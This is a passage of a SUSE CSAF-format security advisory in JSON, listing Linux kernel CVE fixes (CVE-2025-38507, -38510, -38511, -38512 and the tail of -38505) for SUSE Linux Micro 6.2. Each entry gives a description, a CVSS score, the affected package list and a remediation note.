"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "low"
}
],
"title": "CVE-2025-38505"
},
{
"cve": "CVE-2025-38507",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38507"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: nintendo: avoid bluetooth suspend/resume stalls\n\nEnsure we don\u0027t stall or panic the kernel when using bluetooth-connected\ncontrollers. This was reported as an issue on android devices using\nkernel 6.6 due to the resume hook which had been added for usb joycons.\n\nFirst, set a new state value to JOYCON_CTLR_STATE_SUSPENDED in a\nnewly-added nintendo_hid_suspend. This makes sure we will not stall out\nthe kernel waiting for input reports during led classdev suspend. The\nstalls could happen if connectivity is unreliable or lost to the\ncontroller prior to suspend.\n\nSecond, since we lose connectivity during suspend, do not try\njoycon_init() for bluetooth controllers in the nintendo_hid_resume path.\n\nTested via multiple suspend/resume flows when using the controller both\nin USB and bluetooth modes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38507",
"url": "https://www.suse.com/security/cve/CVE-2025-38507"
},
{
"category": "external",
"summary": "SUSE Bug 1248188 for CVE-2025-38507",
"url": "https://bugzilla.suse.com/1248188"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38507"
},
{
"cve": "CVE-2025-38510",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38510"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nkasan: remove kasan_find_vm_area() to prevent possible deadlock\n\nfind_vm_area() couldn\u0027t be called in atomic_context. If find_vm_area() is\ncalled to reports vm area information, kasan can trigger deadlock like:\n\nCPU0 CPU1\nvmalloc();\n alloc_vmap_area();\n spin_lock(\u0026vn-\u003ebusy.lock)\n spin_lock_bh(\u0026some_lock);\n \u003cinterrupt occurs\u003e\n \u003cin softirq\u003e\n spin_lock(\u0026some_lock);\n \u003caccess invalid address\u003e\n kasan_report();\n print_report();\n print_address_description();\n kasan_find_vm_area();\n find_vm_area();\n spin_lock(\u0026vn-\u003ebusy.lock) // deadlock!\n\nTo prevent possible deadlock while kasan reports, remove kasan_find_vm_area().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38510",
"url": "https://www.suse.com/security/cve/CVE-2025-38510"
},
{
"category": "external",
"summary": "SUSE Bug 1248166 for CVE-2025-38510",
"url": "https://bugzilla.suse.com/1248166"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38510"
},
{
"cve": "CVE-2025-38511",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38511"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/pf: Clear all LMTT pages on alloc\n\nOur LMEM buffer objects are not cleared by default on alloc\nand during VF provisioning we only setup LMTT PTEs for the\nactually provisioned LMEM range. But beyond that valid range\nwe might leave some stale data that could either point to some\nother VFs allocations or even to the PF pages.\n\nExplicitly clear all new LMTT page to avoid the risk that a\nmalicious VF would try to exploit that gap.\n\nWhile around add asserts to catch any undesired PTE overwrites\nand low-level debug traces to track LMTT PT life-cycle.\n\n(cherry picked from commit 3fae6918a3e27cce20ded2551f863fb05d4bef8d)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38511",
"url": "https://www.suse.com/security/cve/CVE-2025-38511"
},
{
"category": "external",
"summary": "SUSE Bug 1248175 for CVE-2025-38511",
"url": "https://bugzilla.suse.com/1248175"
},
{
"category": "external",
"summary": "SUSE Bug 1248176 for CVE-2025-38511",
"url": "https://bugzilla.suse.com/1248176"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-38511"
},
{
"cve": "CVE-2025-38512",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38512"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: prevent A-MSDU attacks in mesh networks\n\nThis patch is a mitigation to prevent the A-MSDU spoofing vulnerability\nfor mesh networks. The initial update to the IEEE 802.11 standard, in\nresponse to the FragAttacks, missed this case (CVE-2025-27558). It can\nbe considered a variant of CVE-2020-24588 but for mesh networks.\n\nThis patch tries to detect if a standard MSDU was turned into an A-MSDU\nby an adversary. This is done by parsing a received A-MSDU as a standard\nMSDU, calculating the length of the Mesh Control header, and seeing if\nthe 6 bytes after this header equal the start of an rfc1042 header. If\nequal, this is a strong indication of an ongoing attack attempt.\n\nThis defense was tested with mac80211_hwsim against a mesh network that\nuses an empty Mesh Address Extension field, i.e., when four addresses\nare used, and when using a 12-byte Mesh Address Extension field, i.e.,\nwhen six addresses are used. Functionality of normal MSDUs and A-MSDUs\nwas also tested, and confirmed working, when using both an empty and\n12-byte Mesh Address Extension field.\n\nIt was also tested with mac80211_hwsim that A-MSDU attacks in non-mesh\nnetworks keep being detected and prevented.\n\nNote that the vulnerability being patched, and the defense being\nimplemented, was also discussed in the following paper and in the\nfollowing IEEE 802.11 presentation:\n\nhttps://papers.mathyvanhoef.com/wisec2025.pdf\nhttps://mentor.ieee.org/802.11/dcn/25/11-25-0949-00-000m-a-msdu-mesh-spoof-protection.docx",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
